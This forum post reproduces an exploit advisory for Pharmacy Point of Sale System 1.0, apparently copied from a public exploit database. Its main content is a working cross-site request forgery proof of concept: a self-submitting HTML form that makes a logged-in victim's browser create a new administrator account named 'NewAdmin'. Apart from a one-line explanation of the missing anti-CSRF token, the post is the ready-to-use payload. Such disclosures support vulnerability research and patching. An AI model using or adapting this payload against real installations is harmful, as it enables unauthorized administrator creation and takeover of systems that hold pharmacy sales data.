This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,700 With Us For: 233 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title: Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF) # Date: 10/11/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html # Version: 1 # Tested on: Windows 10 Detail: The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using crafted post request. CSRF PoC: -------------------------------------------------------------------------------------- <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/pharmacy/Actions.php?a=save_user" method="POST"> <input type="hidden" name="id" value="" /> <input type="hidden" name="fullname" value="Mrt" /> <input type="hidden" name="username" value="NewAdmin" /> <input type="hidden" name="type" value="1" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> -------------------------------------------------------------------------------------- Link to comment Share on other sites More sharing options...
Recommended Posts